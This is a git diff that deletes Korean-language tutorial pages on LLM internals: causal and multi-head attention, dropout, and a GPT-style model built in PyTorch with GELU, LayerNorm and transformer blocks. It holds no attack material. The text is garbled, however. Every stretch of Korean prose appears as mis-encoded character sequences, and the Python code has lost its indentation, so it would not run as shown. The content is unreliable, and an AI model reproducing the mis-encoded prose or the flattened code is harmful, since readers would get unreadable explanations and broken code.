-keys = self.W_key(x) -queries = self.W_query(x) -values = self.W_value(x) - -attn_scores = queries @ keys.T -attn_weights = torch.softmax(attn_scores / keys.shape[-1]**0.5, dim=-1) - -context_vec = attn_weights @ values -return context_vec - -d_in=3 -d_out=2 -torch.manual_seed(789) -sa_v2 = SelfAttention_v2(d_in, d_out) -print(sa_v2(inputs)) -``` -> [!NOTE] -> ๋งคํŠธ๋ฆญ์Šค๋ฅผ ์ž„์˜์˜ ๊ฐ’์œผ๋กœ ์ดˆ๊ธฐํ™”ํ•˜๋Š” ๋Œ€์‹ , `nn.Linear`๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ๋ชจ๋“  ๊ฐ€์ค‘์น˜๋ฅผ ํ•™์Šตํ•  ๋งค๊ฐœ๋ณ€์ˆ˜๋กœ ํ‘œ์‹œํ•ฉ๋‹ˆ๋‹ค. - -## ์ธ๊ณผ์  ์ฃผ์˜: ๋ฏธ๋ž˜ ๋‹จ์–ด ์ˆจ๊ธฐ๊ธฐ - -LLM์—์„œ๋Š” ๋ชจ๋ธ์ด ํ˜„์žฌ ์œ„์น˜ ์ด์ „์— ๋‚˜ํƒ€๋‚˜๋Š” ํ† ํฐ๋งŒ ๊ณ ๋ คํ•˜์—ฌ **๋‹ค์Œ ํ† ํฐ์„ ์˜ˆ์ธก**ํ•˜๋„๋ก ํ•˜๊ธฐ๋ฅผ ์›ํ•ฉ๋‹ˆ๋‹ค. **์ธ๊ณผ์  ์ฃผ์˜**๋Š” **๋งˆ์Šคํ‚น๋œ ์ฃผ์˜**๋ผ๊ณ ๋„ ํ•˜๋ฉฐ, ์ฃผ์˜ ๋ฉ”์ปค๋‹ˆ์ฆ˜์„ ์ˆ˜์ •ํ•˜์—ฌ ๋ฏธ๋ž˜ ํ† ํฐ์— ๋Œ€ํ•œ ์ ‘๊ทผ์„ ๋ฐฉ์ง€ํ•จ์œผ๋กœ์จ ์ด๋ฅผ ๋‹ฌ์„ฑํ•ฉ๋‹ˆ๋‹ค. - -### ์ธ๊ณผ์  ์ฃผ์˜ ๋งˆ์Šคํฌ ์ ์šฉ - -์ธ๊ณผ์  ์ฃผ์˜๋ฅผ ๊ตฌํ˜„ํ•˜๊ธฐ ์œ„ํ•ด, ์†Œํ”„ํŠธ๋งฅ์Šค ์—ฐ์‚ฐ **์ด์ „**์— ์ฃผ์˜ ์ ์ˆ˜์— ๋งˆ์Šคํฌ๋ฅผ ์ ์šฉํ•˜์—ฌ ๋‚˜๋จธ์ง€ ์ ์ˆ˜๊ฐ€ ์—ฌ์ „ํžˆ 1์ด ๋˜๋„๋ก ํ•ฉ๋‹ˆ๋‹ค. ์ด ๋งˆ์Šคํฌ๋Š” ๋ฏธ๋ž˜ ํ† ํฐ์˜ ์ฃผ์˜ ์ ์ˆ˜๋ฅผ ์Œ์˜ ๋ฌดํ•œ๋Œ€๋กœ ์„ค์ •ํ•˜์—ฌ ์†Œํ”„ํŠธ๋งฅ์Šค ์ดํ›„์— ๊ทธ๋“ค์˜ ์ฃผ์˜ ๊ฐ€์ค‘์น˜๊ฐ€ 0์ด ๋˜๋„๋ก ๋ณด์žฅํ•ฉ๋‹ˆ๋‹ค. - -**๋‹จ๊ณ„** - -1. **์ฃผ์˜ ์ ์ˆ˜ ๊ณ„์‚ฐ**: ์ด์ „๊ณผ ๋™์ผํ•ฉ๋‹ˆ๋‹ค. -2. **๋งˆ์Šคํฌ ์ ์šฉ**: ๋Œ€๊ฐ์„  ์œ„์— ์Œ์˜ ๋ฌดํ•œ๋Œ€๋กœ ์ฑ„์›Œ์ง„ ์ƒ์‚ผ๊ฐ ํ–‰๋ ฌ์„ ์‚ฌ์šฉํ•ฉ๋‹ˆ๋‹ค. - -```python -mask = torch.triu(torch.ones(seq_len, seq_len), diagonal=1) * float('-inf') -masked_scores = attention_scores + mask -``` - -3. **์†Œํ”„ํŠธ๋งฅ์Šค ์ ์šฉ**: ๋งˆ์Šคํ‚น๋œ ์ ์ˆ˜๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์ฃผ์˜ ๊ฐ€์ค‘์น˜๋ฅผ ๊ณ„์‚ฐํ•ฉ๋‹ˆ๋‹ค. - -```python -attention_weights = torch.softmax(masked_scores, dim=-1) -``` - -### ๋“œ๋กญ์•„์›ƒ์œผ๋กœ ์ถ”๊ฐ€ ์ฃผ์˜ ๊ฐ€์ค‘์น˜ ๋งˆ์Šคํ‚น - -**๊ณผ์ ํ•ฉ์„ ๋ฐฉ์ง€ํ•˜๊ธฐ ์œ„ํ•ด**, ์†Œํ”„ํŠธ๋งฅ์Šค ์—ฐ์‚ฐ ํ›„ ์ฃผ์˜ ๊ฐ€์ค‘์น˜์— **๋“œ๋กญ์•„์›ƒ**์„ ์ ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๋“œ๋กญ์•„์›ƒ์€ ํ•™์Šต ์ค‘์— **์ผ๋ถ€ ์ฃผ์˜ ๊ฐ€์ค‘์น˜๋ฅผ ๋ฌด์ž‘์œ„๋กœ 0์œผ๋กœ ๋งŒ๋“ญ๋‹ˆ๋‹ค**. -```python -dropout = nn.Dropout(p=0.5) -attention_weights = dropout(attention_weights) -``` -์ •๊ธฐ์ ์ธ ๋“œ๋กญ์•„์›ƒ์€ ์•ฝ 10-20%์ž…๋‹ˆ๋‹ค. - -### ์ฝ”๋“œ ์˜ˆ์ œ - -์ฝ”๋“œ ์˜ˆ์ œ๋Š” [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb)์—์„œ ๊ฐ€์ ธ์™”์Šต๋‹ˆ๋‹ค: -```python -import torch -import torch.nn as nn - -inputs = torch.tensor( -[[0.43, 0.15, 0.89], # Your (x^1) -[0.55, 0.87, 0.66], # journey (x^2) -[0.57, 0.85, 0.64], # starts (x^3) -[0.22, 0.58, 0.33], # with (x^4) -[0.77, 0.25, 0.10], # one (x^5) -[0.05, 0.80, 0.55]] # step (x^6) -) - -batch = torch.stack((inputs, inputs), dim=0) -print(batch.shape) - -class CausalAttention(nn.Module): - -def __init__(self, d_in, d_out, context_length, -dropout, qkv_bias=False): -super().__init__() -self.d_out = d_out -self.W_query = nn.Linear(d_in, d_out, bias=qkv_bias) -self.W_key = nn.Linear(d_in, d_out, bias=qkv_bias) -self.W_value = nn.Linear(d_in, d_out, bias=qkv_bias) -self.dropout = nn.Dropout(dropout) -self.register_buffer('mask', torch.triu(torch.ones(context_length, context_length), diagonal=1)) # New - -def forward(self, x): -b, num_tokens, d_in = x.shape -# b is the num of batches -# num_tokens is the number of tokens per batch -# d_in is the dimensions er token - -keys = self.W_key(x) # This generates the keys of the tokens -queries = self.W_query(x) -values = self.W_value(x) - -attn_scores = queries @ keys.transpose(1, 2) # Moves the third dimension to the second one and the second one to the third one to be able to multiply -attn_scores.masked_fill_( # New, _ ops are in-place -self.mask.bool()[:num_tokens, :num_tokens], -torch.inf) # `:num_tokens` to account for cases where the number of tokens in the batch is smaller than the supported context_size -attn_weights = torch.softmax( -attn_scores / keys.shape[-1]**0.5, dim=-1 -) -attn_weights = self.dropout(attn_weights) - -context_vec = attn_weights @ values -return context_vec - -torch.manual_seed(123) - -context_length = batch.shape[1] -d_in = 3 -d_out = 2 -ca = CausalAttention(d_in, d_out, context_length, 0.0) - -context_vecs = ca(batch) - -print(context_vecs) -print("context_vecs.shape:", context_vecs.shape) -``` -## Single-Head Attention์„ Multi-Head Attention์œผ๋กœ ํ™•์žฅํ•˜๊ธฐ - -**Multi-head attention**์€ ์‹ค์งˆ์ ์œผ๋กœ **์ž๊ธฐ ์ฃผ์˜ ํ•จ์ˆ˜**์˜ **์—ฌ๋Ÿฌ ์ธ์Šคํ„ด์Šค**๋ฅผ ์‹คํ–‰ํ•˜๋Š” ๊ฒƒ์œผ๋กœ, ๊ฐ ์ธ์Šคํ„ด์Šค๋Š” **์ž์‹ ์˜ ๊ฐ€์ค‘์น˜**๋ฅผ ๊ฐ€์ง€๊ณ  ์žˆ์–ด ์„œ๋กœ ๋‹ค๋ฅธ ์ตœ์ข… ๋ฒกํ„ฐ๊ฐ€ ๊ณ„์‚ฐ๋ฉ๋‹ˆ๋‹ค. - -### ์ฝ”๋“œ ์˜ˆ์ œ - -์ด์ „ ์ฝ”๋“œ๋ฅผ ์žฌ์‚ฌ์šฉํ•˜๊ณ  ์—ฌ๋Ÿฌ ๋ฒˆ ์‹คํ–‰ํ•˜๋Š” ๋ž˜ํผ๋ฅผ ์ถ”๊ฐ€ํ•˜๋Š” ๊ฒƒ์ด ๊ฐ€๋Šฅํ•  ์ˆ˜ ์žˆ์ง€๋งŒ, ์ด๋Š” ๋ชจ๋“  ํ—ค๋“œ๋ฅผ ๋™์‹œ์— ์ฒ˜๋ฆฌํ•˜๋Š” [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb)์—์„œ ๋” ์ตœ์ ํ™”๋œ ๋ฒ„์ „์ž…๋‹ˆ๋‹ค (๋น„์šฉ์ด ๋งŽ์ด ๋“œ๋Š” for ๋ฃจํ”„์˜ ์ˆ˜๋ฅผ ์ค„์ž„). ์ฝ”๋“œ์—์„œ ๋ณผ ์ˆ˜ ์žˆ๋“ฏ์ด, ๊ฐ ํ† ํฐ์˜ ์ฐจ์›์€ ํ—ค๋“œ ์ˆ˜์— ๋”ฐ๋ผ ์„œ๋กœ ๋‹ค๋ฅธ ์ฐจ์›์œผ๋กœ ๋‚˜๋‰ฉ๋‹ˆ๋‹ค. ์ด๋ ‡๊ฒŒ ํ•˜๋ฉด ํ† ํฐ์ด 8์ฐจ์›์„ ๊ฐ€์ง€๊ณ  ์žˆ๊ณ  3๊ฐœ์˜ ํ—ค๋“œ๋ฅผ ์‚ฌ์šฉํ•˜๊ณ ์ž ํ•  ๊ฒฝ์šฐ, ์ฐจ์›์€ 4์ฐจ์› ๋ฐฐ์—ด 2๊ฐœ๋กœ ๋‚˜๋‰˜๊ณ  ๊ฐ ํ—ค๋“œ๋Š” ๊ทธ ์ค‘ ํ•˜๋‚˜๋ฅผ ์‚ฌ์šฉํ•˜๊ฒŒ ๋ฉ๋‹ˆ๋‹ค: -```python -class MultiHeadAttention(nn.Module): -def __init__(self, d_in, d_out, context_length, dropout, num_heads, qkv_bias=False): -super().__init__() -assert (d_out % num_heads == 0), \ -"d_out must be divisible by num_heads" - -self.d_out = d_out -self.num_heads = num_heads -self.head_dim = d_out // num_heads # Reduce the projection dim to match desired output dim - -self.W_query = nn.Linear(d_in, d_out, bias=qkv_bias) -self.W_key = nn.Linear(d_in, d_out, bias=qkv_bias) -self.W_value = nn.Linear(d_in, d_out, bias=qkv_bias) -self.out_proj = nn.Linear(d_out, d_out) # Linear layer to combine head outputs -self.dropout = nn.Dropout(dropout) -self.register_buffer( -"mask", -torch.triu(torch.ones(context_length, context_length), -diagonal=1) -) - -def forward(self, x): -b, num_tokens, d_in = x.shape -# b is the num of batches -# num_tokens is the number of tokens per batch -# d_in is the dimensions er token - -keys = self.W_key(x) # Shape: (b, num_tokens, d_out) -queries = self.W_query(x) -values = self.W_value(x) - -# We implicitly split the matrix by adding a `num_heads` dimension -# Unroll last dim: (b, num_tokens, d_out) -> (b, num_tokens, num_heads, head_dim) -keys = keys.view(b, num_tokens, self.num_heads, self.head_dim) -values = values.view(b, num_tokens, self.num_heads, self.head_dim) -queries = queries.view(b, num_tokens, self.num_heads, self.head_dim) - -# Transpose: (b, num_tokens, num_heads, head_dim) -> (b, num_heads, num_tokens, head_dim) -keys = keys.transpose(1, 2) -queries = queries.transpose(1, 2) -values = values.transpose(1, 2) - -# Compute scaled dot-product attention (aka self-attention) with a causal mask -attn_scores = queries @ keys.transpose(2, 3) # Dot product for each head - -# Original mask truncated to the number of tokens and converted to boolean -mask_bool = self.mask.bool()[:num_tokens, :num_tokens] - -# Use the mask to fill attention scores -attn_scores.masked_fill_(mask_bool, -torch.inf) - -attn_weights = torch.softmax(attn_scores / keys.shape[-1]**0.5, dim=-1) -attn_weights = self.dropout(attn_weights) - -# Shape: (b, num_tokens, num_heads, head_dim) -context_vec = (attn_weights @ values).transpose(1, 2) - -# Combine heads, where self.d_out = self.num_heads * self.head_dim -context_vec = context_vec.contiguous().view(b, num_tokens, self.d_out) -context_vec = self.out_proj(context_vec) # optional projection - -return context_vec - -torch.manual_seed(123) - -batch_size, context_length, d_in = batch.shape -d_out = 2 -mha = MultiHeadAttention(d_in, d_out, context_length, 0.0, num_heads=2) - -context_vecs = mha(batch) - -print(context_vecs) -print("context_vecs.shape:", context_vecs.shape) - -``` -๋‹ค๋ฅธ ๊ฐ„๊ฒฐํ•˜๊ณ  ํšจ์œจ์ ์ธ ๊ตฌํ˜„์„ ์œ„ํ•ด PyTorch์˜ [`torch.nn.MultiheadAttention`](https://pytorch.org/docs/stable/generated/torch.nn.MultiheadAttention.html) ํด๋ž˜์Šค๋ฅผ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. - -> [!TIP] -> ChatGPT์˜ ์งง์€ ๋‹ต๋ณ€: ์™œ ๊ฐ ํ—ค๋“œ๊ฐ€ ๋ชจ๋“  ํ† ํฐ์˜ ๋ชจ๋“  ์ฐจ์›์„ ํ™•์ธํ•˜๋Š” ๋Œ€์‹  ํ† ํฐ์˜ ์ฐจ์›์„ ํ—ค๋“œ ๊ฐ„์— ๋‚˜๋ˆ„๋Š” ๊ฒƒ์ด ๋” ๋‚˜์€์ง€์— ๋Œ€ํ•œ ์„ค๋ช…: -> -> ๊ฐ ํ—ค๋“œ๊ฐ€ ๋ชจ๋“  ์ž„๋ฒ ๋”ฉ ์ฐจ์›์„ ์ฒ˜๋ฆฌํ•  ์ˆ˜ ์žˆ๋„๋ก ํ•˜๋Š” ๊ฒƒ์ด ์ „์ฒด ์ •๋ณด๋ฅผ ์ ‘๊ทผํ•  ์ˆ˜ ์žˆ๊ธฐ ๋•Œ๋ฌธ์— ์œ ๋ฆฌํ•ด ๋ณด์ผ ์ˆ˜ ์žˆ์ง€๋งŒ, ํ‘œ์ค€ ๊ด€ํ–‰์€ **์ž„๋ฒ ๋”ฉ ์ฐจ์›์„ ํ—ค๋“œ ๊ฐ„์— ๋‚˜๋ˆ„๋Š” ๊ฒƒ**์ž…๋‹ˆ๋‹ค. ์ด ์ ‘๊ทผ ๋ฐฉ์‹์€ ๊ณ„์‚ฐ ํšจ์œจ์„ฑ๊ณผ ๋ชจ๋ธ ์„ฑ๋Šฅ์˜ ๊ท ํ˜•์„ ๋งž์ถ”๊ณ  ๊ฐ ํ—ค๋“œ๊ฐ€ ๋‹ค์–‘ํ•œ ํ‘œํ˜„์„ ํ•™์Šตํ•˜๋„๋ก ์žฅ๋ คํ•ฉ๋‹ˆ๋‹ค. ๋”ฐ๋ผ์„œ ์ž„๋ฒ ๋”ฉ ์ฐจ์›์„ ๋‚˜๋ˆ„๋Š” ๊ฒƒ์ด ์ผ๋ฐ˜์ ์œผ๋กœ ๊ฐ ํ—ค๋“œ๊ฐ€ ๋ชจ๋“  ์ฐจ์›์„ ํ™•์ธํ•˜๋Š” ๊ฒƒ๋ณด๋‹ค ์„ ํ˜ธ๋ฉ๋‹ˆ๋‹ค. - -## References - -- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch) diff --git a/src/todo/llm-training-data-preparation/5.-llm-architecture.md b/src/todo/llm-training-data-preparation/5.-llm-architecture.md deleted file mode 100644 index ba4547a23..000000000 --- a/src/todo/llm-training-data-preparation/5.-llm-architecture.md +++ /dev/null @@ -1,666 +0,0 @@ -# 5. LLM Architecture - -## LLM Architecture - -> [!TIP] -> ์ด ๋‹ค์„ฏ ๋ฒˆ์งธ ๋‹จ๊ณ„์˜ ๋ชฉํ‘œ๋Š” ๋งค์šฐ ๊ฐ„๋‹จํ•ฉ๋‹ˆ๋‹ค: **์ „์ฒด LLM์˜ ์•„ํ‚คํ…์ฒ˜๋ฅผ ๊ฐœ๋ฐœํ•˜๋Š” ๊ฒƒ**์ž…๋‹ˆ๋‹ค. ๋ชจ๋“  ๊ฒƒ์„ ๊ฒฐํ•ฉํ•˜๊ณ , ๋ชจ๋“  ๋ ˆ์ด์–ด๋ฅผ ์ ์šฉํ•˜๋ฉฐ, ํ…์ŠคํŠธ๋ฅผ ์ƒ์„ฑํ•˜๊ฑฐ๋‚˜ ํ…์ŠคํŠธ๋ฅผ ID๋กœ ๋ณ€ํ™˜ํ•˜๊ณ  ๋‹ค์‹œ ๋ณ€ํ™˜ํ•˜๋Š” ๋ชจ๋“  ๊ธฐ๋Šฅ์„ ๋งŒ๋“ญ๋‹ˆ๋‹ค. -> -> ์ด ์•„ํ‚คํ…์ฒ˜๋Š” ํ›ˆ๋ จ ํ›„ ํ…์ŠคํŠธ๋ฅผ ํ›ˆ๋ จํ•˜๊ณ  ์˜ˆ์ธกํ•˜๋Š” ๋ฐ ์‚ฌ์šฉ๋ฉ๋‹ˆ๋‹ค. - -LLM ์•„ํ‚คํ…์ฒ˜ ์˜ˆ์‹œ๋Š” [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb)์—์„œ ํ™•์ธํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค: - -๋†’์€ ์ˆ˜์ค€์˜ ํ‘œํ˜„์€ ๋‹ค์Œ์—์„œ ๊ด€์ฐฐํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค: - -

https://camo.githubusercontent.com/6c8c392f72d5b9e86c94aeb9470beab435b888d24135926f1746eb88e0cc18fb/68747470733a2f2f73656261737469616e72617363686b612e636f6d2f696d616765732f4c4c4d732d66726f6d2d736372617463682d696d616765732f636830345f636f6d707265737365642f31332e776562703f31

- -1. **Input (Tokenized Text)**: ํ”„๋กœ์„ธ์Šค๋Š” ํ† ํฐํ™”๋œ ํ…์ŠคํŠธ๋กœ ์‹œ์ž‘๋˜๋ฉฐ, ์ด๋Š” ์ˆซ์ž ํ‘œํ˜„์œผ๋กœ ๋ณ€ํ™˜๋ฉ๋‹ˆ๋‹ค. -2. **Token Embedding and Positional Embedding Layer**: ํ† ํฐํ™”๋œ ํ…์ŠคํŠธ๋Š” **ํ† ํฐ ์ž„๋ฒ ๋”ฉ** ๋ ˆ์ด์–ด์™€ **์œ„์น˜ ์ž„๋ฒ ๋”ฉ ๋ ˆ์ด์–ด**๋ฅผ ํ†ต๊ณผํ•˜์—ฌ, ์‹œํ€€์Šค์—์„œ ํ† ํฐ์˜ ์œ„์น˜๋ฅผ ์บก์ฒ˜ํ•ฉ๋‹ˆ๋‹ค. ์ด๋Š” ๋‹จ์–ด ์ˆœ์„œ๋ฅผ ์ดํ•ดํ•˜๋Š” ๋ฐ ์ค‘์š”ํ•ฉ๋‹ˆ๋‹ค. -3. **Transformer Blocks**: ๋ชจ๋ธ์€ **12๊ฐœ์˜ ํŠธ๋žœ์Šคํฌ๋จธ ๋ธ”๋ก**์„ ํฌํ•จํ•˜๋ฉฐ, ๊ฐ ๋ธ”๋ก์€ ์—ฌ๋Ÿฌ ๋ ˆ์ด์–ด๋กœ ๊ตฌ์„ฑ๋ฉ๋‹ˆ๋‹ค. ์ด ๋ธ”๋ก์€ ๋‹ค์Œ ์‹œํ€€์Šค๋ฅผ ๋ฐ˜๋ณตํ•ฉ๋‹ˆ๋‹ค: -- **Masked Multi-Head Attention**: ๋ชจ๋ธ์ด ์ž…๋ ฅ ํ…์ŠคํŠธ์˜ ๋‹ค์–‘ํ•œ ๋ถ€๋ถ„์— ๋™์‹œ์— ์ง‘์ค‘ํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•ฉ๋‹ˆ๋‹ค. -- **Layer Normalization**: ํ›ˆ๋ จ์„ ์•ˆ์ •ํ™”ํ•˜๊ณ  ๊ฐœ์„ ํ•˜๊ธฐ ์œ„ํ•œ ์ •๊ทœํ™” ๋‹จ๊ณ„์ž…๋‹ˆ๋‹ค. -- **Feed Forward Layer**: ์ฃผ์˜ ๋ ˆ์ด์–ด์—์„œ ์ •๋ณด๋ฅผ ์ฒ˜๋ฆฌํ•˜๊ณ  ๋‹ค์Œ ํ† ํฐ์— ๋Œ€ํ•œ ์˜ˆ์ธก์„ ์ˆ˜ํ–‰ํ•˜๋Š” ์—ญํ• ์„ ํ•ฉ๋‹ˆ๋‹ค. -- **Dropout Layers**: ์ด ๋ ˆ์ด์–ด๋Š” ํ›ˆ๋ จ ์ค‘ ๋ฌด์ž‘์œ„๋กœ ์œ ๋‹›์„ ๋“œ๋กญํ•˜์—ฌ ๊ณผ์ ํ•ฉ์„ ๋ฐฉ์ง€ํ•ฉ๋‹ˆ๋‹ค. -4. **Final Output Layer**: ๋ชจ๋ธ์€ **4x50,257 ์ฐจ์›์˜ ํ…์„œ**๋ฅผ ์ถœ๋ ฅํ•˜๋ฉฐ, ์—ฌ๊ธฐ์„œ **50,257**์€ ์–ดํœ˜์˜ ํฌ๊ธฐ๋ฅผ ๋‚˜ํƒ€๋ƒ…๋‹ˆ๋‹ค. ์ด ํ…์„œ์˜ ๊ฐ ํ–‰์€ ๋ชจ๋ธ์ด ์‹œํ€€์Šค์—์„œ ๋‹ค์Œ ๋‹จ์–ด๋ฅผ ์˜ˆ์ธกํ•˜๋Š” ๋ฐ ์‚ฌ์šฉํ•˜๋Š” ๋ฒกํ„ฐ์— ํ•ด๋‹นํ•ฉ๋‹ˆ๋‹ค. -5. **Goal**: ๋ชฉํ‘œ๋Š” ์ด๋Ÿฌํ•œ ์ž„๋ฒ ๋”ฉ์„ ๊ฐ€์ ธ์™€ ๋‹ค์‹œ ํ…์ŠคํŠธ๋กœ ๋ณ€ํ™˜ํ•˜๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค. ๊ตฌ์ฒด์ ์œผ๋กœ, ์ถœ๋ ฅ์˜ ๋งˆ์ง€๋ง‰ ํ–‰์€ ์ด ๋‹ค์ด์–ด๊ทธ๋žจ์—์„œ "forward"๋กœ ํ‘œ์‹œ๋œ ๋‹ค์Œ ๋‹จ์–ด๋ฅผ ์ƒ์„ฑํ•˜๋Š” ๋ฐ ์‚ฌ์šฉ๋ฉ๋‹ˆ๋‹ค. - -### Code representation -```python -import torch -import torch.nn as nn -import tiktoken - -class GELU(nn.Module): -def __init__(self): -super().__init__() - -def forward(self, x): -return 0.5 * x * (1 + torch.tanh( -torch.sqrt(torch.tensor(2.0 / torch.pi)) * -(x + 0.044715 * torch.pow(x, 3)) -)) - -class FeedForward(nn.Module): -def __init__(self, cfg): -super().__init__() -self.layers = nn.Sequential( -nn.Linear(cfg["emb_dim"], 4 * cfg["emb_dim"]), -GELU(), -nn.Linear(4 * cfg["emb_dim"], cfg["emb_dim"]), -) - -def forward(self, x): -return self.layers(x) - -class MultiHeadAttention(nn.Module): -def __init__(self, d_in, d_out, context_length, dropout, num_heads, qkv_bias=False): -super().__init__() -assert d_out % num_heads == 0, "d_out must be divisible by num_heads" - -self.d_out = d_out -self.num_heads = num_heads -self.head_dim = d_out // num_heads # Reduce the projection dim to match desired output dim - -self.W_query = nn.Linear(d_in, d_out, bias=qkv_bias) -self.W_key = nn.Linear(d_in, d_out, bias=qkv_bias) -self.W_value = nn.Linear(d_in, d_out, bias=qkv_bias) -self.out_proj = nn.Linear(d_out, d_out) # Linear layer to combine head outputs -self.dropout = nn.Dropout(dropout) -self.register_buffer('mask', torch.triu(torch.ones(context_length, context_length), diagonal=1)) - -def forward(self, x): -b, num_tokens, d_in = x.shape - -keys = self.W_key(x) # Shape: (b, num_tokens, d_out) -queries = self.W_query(x) -values = self.W_value(x) - -# We implicitly split the matrix by adding a `num_heads` dimension -# Unroll last dim: (b, num_tokens, d_out) -> (b, num_tokens, num_heads, head_dim) -keys = keys.view(b, num_tokens, self.num_heads, self.head_dim) -values = values.view(b, num_tokens, self.num_heads, self.head_dim) -queries = queries.view(b, num_tokens, self.num_heads, self.head_dim) - -# Transpose: (b, num_tokens, num_heads, head_dim) -> (b, num_heads, num_tokens, head_dim) -keys = keys.transpose(1, 2) -queries = queries.transpose(1, 2) -values = values.transpose(1, 2) - -# Compute scaled dot-product attention (aka self-attention) with a causal mask -attn_scores = queries @ keys.transpose(2, 3) # Dot product for each head - -# Original mask truncated to the number of tokens and converted to boolean -mask_bool = self.mask.bool()[:num_tokens, :num_tokens] - -# Use the mask to fill attention scores -attn_scores.masked_fill_(mask_bool, -torch.inf) - -attn_weights = torch.softmax(attn_scores / keys.shape[-1]**0.5, dim=-1) -attn_weights = self.dropout(attn_weights) - -# Shape: (b, num_tokens, num_heads, head_dim) -context_vec = (attn_weights @ values).transpose(1, 2) - -# Combine heads, where self.d_out = self.num_heads * self.head_dim -context_vec = context_vec.contiguous().view(b, num_tokens, self.d_out) -context_vec = self.out_proj(context_vec) # optional projection - -return context_vec - -class LayerNorm(nn.Module): -def __init__(self, emb_dim): -super().__init__() -self.eps = 1e-5 -self.scale = nn.Parameter(torch.ones(emb_dim)) -self.shift = nn.Parameter(torch.zeros(emb_dim)) - -def forward(self, x): -mean = x.mean(dim=-1, keepdim=True) -var = x.var(dim=-1, keepdim=True, unbiased=False) -norm_x = (x - mean) / torch.sqrt(var + self.eps) -return self.scale * norm_x + self.shift - -class TransformerBlock(nn.Module): -def __init__(self, cfg): -super().__init__() -self.att = MultiHeadAttention( -d_in=cfg["emb_dim"], -d_out=cfg["emb_dim"], -context_length=cfg["context_length"], -num_heads=cfg["n_heads"], -dropout=cfg["drop_rate"], -qkv_bias=cfg["qkv_bias"]) -self.ff = FeedForward(cfg) -self.norm1 = LayerNorm(cfg["emb_dim"]) -self.norm2 = LayerNorm(cfg["emb_dim"]) -self.drop_shortcut = nn.Dropout(cfg["drop_rate"]) - -def forward(self, x): -# Shortcut connection for attention block -shortcut = x -x = self.norm1(x) -x = self.att(x) # Shape [batch_size, num_tokens, emb_size] -x = self.drop_shortcut(x) -x = x + shortcut # Add the original input back - -# Shortcut connection for feed forward block -shortcut = x -x = self.norm2(x) -x = self.ff(x) -x = self.drop_shortcut(x) -x = x + shortcut # Add the original input back - -return x - - -class GPTModel(nn.Module): -def __init__(self, cfg): -super().__init__() -self.tok_emb = nn.Embedding(cfg["vocab_size"], cfg["emb_dim"]) -self.pos_emb = nn.Embedding(cfg["context_length"], cfg["emb_dim"]) -self.drop_emb = nn.Dropout(cfg["drop_rate"]) - -self.trf_blocks = nn.Sequential( -*[TransformerBlock(cfg) for _ in range(cfg["n_layers"])]) - -self.final_norm = LayerNorm(cfg["emb_dim"]) -self.out_head = nn.Linear( -cfg["emb_dim"], cfg["vocab_size"], bias=False -) - -def forward(self, in_idx): -batch_size, seq_len = in_idx.shape -tok_embeds = self.tok_emb(in_idx) -pos_embeds = self.pos_emb(torch.arange(seq_len, device=in_idx.device)) -x = tok_embeds + pos_embeds # Shape [batch_size, num_tokens, emb_size] -x = self.drop_emb(x) -x = self.trf_blocks(x) -x = self.final_norm(x) -logits = self.out_head(x) -return logits - -GPT_CONFIG_124M = { -"vocab_size": 50257, # Vocabulary size -"context_length": 1024, # Context length -"emb_dim": 768, # Embedding dimension -"n_heads": 12, # Number of attention heads -"n_layers": 12, # Number of layers -"drop_rate": 0.1, # Dropout rate -"qkv_bias": False # Query-Key-Value bias -} - -torch.manual_seed(123) -model = GPTModel(GPT_CONFIG_124M) -out = model(batch) -print("Input batch:\n", batch) -print("\nOutput shape:", out.shape) -print(out) -``` -### **GELU ํ™œ์„ฑํ™” ํ•จ์ˆ˜** -```python -# From https://github.com/rasbt/LLMs-from-scratch/tree/main/ch04 -class GELU(nn.Module): -def __init__(self): -super().__init__() - -def forward(self, x): -return 0.5 * x * (1 + torch.tanh( -torch.sqrt(torch.tensor(2.0 / torch.pi)) * -(x + 0.044715 * torch.pow(x, 3)) -)) -``` -#### **๋ชฉ์  ๋ฐ ๊ธฐ๋Šฅ** - -- **GELU (๊ฐ€์šฐ์‹œ์•ˆ ์˜ค๋ฅ˜ ์„ ํ˜• ๋‹จ์œ„):** ๋ชจ๋ธ์— ๋น„์„ ํ˜•์„ฑ์„ ๋„์ž…ํ•˜๋Š” ํ™œ์„ฑํ™” ํ•จ์ˆ˜์ž…๋‹ˆ๋‹ค. -- **๋ถ€๋“œ๋Ÿฌ์šด ํ™œ์„ฑํ™”:** ์Œ์ˆ˜ ์ž…๋ ฅ์„ 0์œผ๋กœ ๋งŒ๋“œ๋Š” ReLU์™€ ๋‹ฌ๋ฆฌ, GELU๋Š” ์ž…๋ ฅ์„ ์ถœ๋ ฅ์œผ๋กœ ๋ถ€๋“œ๋Ÿฝ๊ฒŒ ๋งคํ•‘ํ•˜์—ฌ ์Œ์ˆ˜ ์ž…๋ ฅ์— ๋Œ€ํ•ด ์ž‘์€ ๋น„์˜ ๊ฐ’๋„ ํ—ˆ์šฉํ•ฉ๋‹ˆ๋‹ค. -- **์ˆ˜ํ•™์  ์ •์˜:** - -
